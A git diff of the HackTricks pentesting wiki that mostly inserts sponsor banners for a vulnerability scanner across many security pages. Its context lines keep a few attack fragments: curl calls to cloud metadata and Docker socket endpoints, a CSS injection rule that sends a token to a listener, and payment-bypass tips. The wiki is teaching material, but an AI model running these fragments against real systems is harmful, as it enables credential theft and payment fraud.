+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + ☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! diff --git a/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md index 3201512f4..00427cf1f 100644 --- a/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md +++ b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ### **What is a RID** A [Relative Identifier (RID)](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-identifiers) is a **unique identifier** (represented in hexadecimal format) utilized by Windows to **track and identify objects**. To explain how this fits in, let's look at the examples below: @@ -98,6 +106,13 @@ done To **understand** better how the tools _**samrdump**_ **and** _**rpcdump**_ works you should read [**Pentesting MSRPC**](../135-pentesting-msrpc.md). +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md index 8ca5c5790..d7bf6b041 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ### SSRF PHP functions Some function such as _**file\_get\_contents(), fopen(), file(), md5\_file()** _ accept URLs as input that they will follow making **possible SSRF vulnerabilities** if the use can control the data: @@ -64,6 +72,13 @@ $context = stream_context_create($options); $file = file_get_contents($url, false, $context); ``` +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/network-services-pentesting/pentesting-web/tomcat.md b/network-services-pentesting/pentesting-web/tomcat.md index c31957b4a..bb91520d9 100644 --- a/network-services-pentesting/pentesting-web/tomcat.md +++ b/network-services-pentesting/pentesting-web/tomcat.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Discovery * It usually runs on **port 8080** @@ -255,6 +263,13 @@ msf> use post/windows/gather/enum_tomcat
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + + ☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! diff --git a/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md b/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md index 490bfca8e..c9f0d1f47 100644 --- a/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md +++ b/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ### Avoid to run with root In order to not run Tomcat with root a very common configuration is to set an Apache server in port 80/443 and, if the requested path matches a regexp, the request is sent to Tomcat running on a different port. @@ -149,6 +157,13 @@ The file shows us what each of the roles `manager-gui`, `manager-script`, `manag * [https://academy.hackthebox.com/module/113/section/1090](https://academy.hackthebox.com/module/113/section/1090) +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/pentesting-web/bypass-payment-process.md b/pentesting-web/bypass-payment-process.md index a461a9742..981ab0c85 100644 --- a/pentesting-web/bypass-payment-process.md +++ b/pentesting-web/bypass-payment-process.md @@ -1,4 +1,4 @@ - +# Bypass Payment Process
@@ -16,6 +16,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + 1. It is preferable to choose **PayPal** or **CoinPayments** as a payment method 2. Intercept all requests, you may find a parameter called _**Success**_ or _**Referrer**_ or _**Callback**_ @@ -24,6 +32,13 @@ @SalahHasoneh1 +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +***
diff --git a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md index 6c98b2888..16671a2e4 100644 --- a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md +++ b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Basic Information JNDI has been present in Java since the late 1990s. It is a directory service that **allows a Java program to find data through a directory using a name service**. A name service associates values (bindings), so it can be obtained through its reference in the directory. @@ -480,6 +488,13 @@ In this [**writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-l * [https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/) * [https://sigflag.at/blog/2022/writeup-googlectf2022-log4j/](https://sigflag.at/blog/2022/writeup-googlectf2022-log4j/) +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/pentesting-web/formula-doc-latex-injection.md b/pentesting-web/formula-doc-latex-injection.md index 03c8f1d44..5fd127806 100644 --- a/pentesting-web/formula-doc-latex-injection.md +++ b/pentesting-web/formula-doc-latex-injection.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Formula Injection ### Info @@ -241,6 +249,13 @@ From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) * [https://salmonsec.com/cheatsheet/latex\_injection](https://salmonsec.com/cheatsheet/latex\_injection) * [https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/) +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/pentesting-web/h2c-smuggling.md b/pentesting-web/h2c-smuggling.md index b77244070..a609ecc33 100644 --- a/pentesting-web/h2c-smuggling.md +++ b/pentesting-web/h2c-smuggling.md @@ -16,6 +16,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## H2C Smuggling ### HTTP2 Over Cleartext (H2C) @@ -125,6 +133,13 @@ Check the labs to test both scenarios in [https://github.com/0ang3el/websocket-s * [https://bishopfox.com/blog/h2c-smuggling-request](https://bishopfox.com/blog/h2c-smuggling-request) * [https://github.com/0ang3el/websocket-smuggle.git](https://github.com/0ang3el/websocket-smuggle.git) +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/pentesting-web/hacking-with-cookies/README.md b/pentesting-web/hacking-with-cookies/README.md index 1f15f2526..d2a989076 100644 --- a/pentesting-web/hacking-with-cookies/README.md +++ b/pentesting-web/hacking-with-cookies/README.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Cookies Attributes ### Expires & Max-Age @@ -291,6 +299,13 @@ There should be a pattern (with the size of a used block). So, knowing how are a * [https://blog.ankursundara.com/cookie-bugs/](https://blog.ankursundara.com/cookie-bugs/) +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md index 4e444b8b7..044664434 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md +++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## AWS ### Abusing SSRF in AWS EC2 environment @@ -325,6 +333,14 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re curl http://169.254.169.254/metadata/v1.json | jq ``` +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Azure ### Azure VM @@ -552,6 +568,13 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json curl http://rancher-metadata// ``` +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md index adc7edf27..6d9e60027 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md +++ b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ### Localhost ```bash @@ -212,6 +220,14 @@ Both of them describe a way of parsing URI/URLs, with one slight difference. The image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/) + +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/pentesting-web/xs-search/css-injection/css-injection-code.md b/pentesting-web/xs-search/css-injection/css-injection-code.md index 181b7b1ce..409235949 100644 --- a/pentesting-web/xs-search/css-injection/css-injection-code.md +++ b/pentesting-web/xs-search/css-injection/css-injection-code.md @@ -16,6 +16,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + {% code title="victim.html" %} ```html @@ -229,6 +237,12 @@ input[value=]{list-style:url(http://localhost:5001/end?token=&)}; ``` {% endcode %} +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md b/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md index b8d43a29b..dee853e88 100644 --- a/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md +++ b/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md @@ -14,6 +14,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Basic Information A service worker is a **script** that your browser **runs** in the **background**, separate from a web page, opening the door to features that don't need a web page or user interaction. ([More info about what is a service worker here](https://developers.google.com/web/fundamentals/primers/service-workers)).\ @@ -116,6 +124,13 @@ For an example of this check the reference link. * [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering) +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/reversing/common-api-used-in-malware.md b/reversing/common-api-used-in-malware.md index 993e767f2..32c52e6e1 100644 --- a/reversing/common-api-used-in-malware.md +++ b/reversing/common-api-used-in-malware.md @@ -16,6 +16,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + # Generic @@ -152,6 +160,12 @@ The malware will unmap the legitimate code from memory of the process and load a * **Inline Hooks**: This type are difficult to achieve. This involve modifying the code of the functions itself. Maybe by putting a jump at the beginning of this. +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/reversing/reversing-tools-basic-methods/README.md b/reversing/reversing-tools-basic-methods/README.md index 0507a7fe0..e63875546 100644 --- a/reversing/reversing-tools-basic-methods/README.md +++ b/reversing/reversing-tools-basic-methods/README.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## ImGui Based Reversing tools Software: @@ -257,6 +265,15 @@ And [install keystone](https://github.com/keystone-engine/keystone/blob/master/d If you are playing a **CTF, this workaround to find the flag** could be very useful: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html) + +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Rust To find the **entry point** search the functions by `::main` like in: @@ -416,6 +433,13 @@ So, in this challenge, knowing the values of the buttons, you needed to **press * [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering) * [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation) + +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/stego/stego-tricks.md b/stego/stego-tricks.md index 03f86171b..e9e3d83d5 100644 --- a/stego/stego-tricks.md +++ b/stego/stego-tricks.md @@ -12,13 +12,13 @@
-![](<../.gitbook/assets/image (9) (1) (2).png>) +
-\ -Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** ## Extracting data from all files @@ -222,13 +222,12 @@ To read a QR code: [https://online-barcode-reader.inliteresearch.com/](https://o * [**https://0xrick.github.io/lists/stego/**](https://0xrick.github.io/lists/stego/) * [**https://github.com/DominicBreuker/stego-toolkit**](https://github.com/DominicBreuker/stego-toolkit) -![](<../.gitbook/assets/image (9) (1) (2).png>) +
-\ -Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
diff --git a/todo/radio-hacking/flipper-zero/README.md b/todo/radio-hacking/flipper-zero/README.md index 182cb601f..24182bbfa 100644 --- a/todo/radio-hacking/flipper-zero/README.md +++ b/todo/radio-hacking/flipper-zero/README.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + With [**Flipper Zero**](https://flipperzero.one/) you can: * **Listen/Capture/Replay radio frequencies:** [**Sub-GHz**](fz-sub-ghz.md)**** @@ -25,6 +33,13 @@ With [**Flipper Zero**](https://flipperzero.one/) you can: **Other Flipper Zero resources in** [**https://github.com/djsime1/awesome-flipperzero**](https://github.com/djsime1/awesome-flipperzero)**** +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/todo/radio-hacking/flipper-zero/fz-nfc.md b/todo/radio-hacking/flipper-zero/fz-nfc.md index 6fdf3da3c..269c98839 100644 --- a/todo/radio-hacking/flipper-zero/fz-nfc.md +++ b/todo/radio-hacking/flipper-zero/fz-nfc.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Intro For info about RFID and NFC check the following page: @@ -87,6 +95,13 @@ However, you **can't read the CVV this way** (the 3 digits on the back of the ca * [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/) +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md index 29bd8f8cc..f790479d1 100644 --- a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md +++ b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Intro Flipper Zero can **receive and transmit radio frequencies in the range of 300-928 MHz** with its built-in module, which can read, save, and emulate remote controls. These controls are used for interaction with gates, barriers, radio locks, remote control switches, wireless doorbells, smart lights, and more. Flipper Zero can help you to learn if your security is compromised. @@ -116,7 +124,13 @@ Get dBms of the saved frequencies ## Reference * [https://docs.flipperzero.one/sub-ghz](https://docs.flipperzero.one/sub-ghz) -* + +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} +
diff --git a/todo/radio-hacking/proxmark-3.md b/todo/radio-hacking/proxmark-3.md index 7c3b297af..2da17bd76 100644 --- a/todo/radio-hacking/proxmark-3.md +++ b/todo/radio-hacking/proxmark-3.md @@ -12,6 +12,14 @@
+
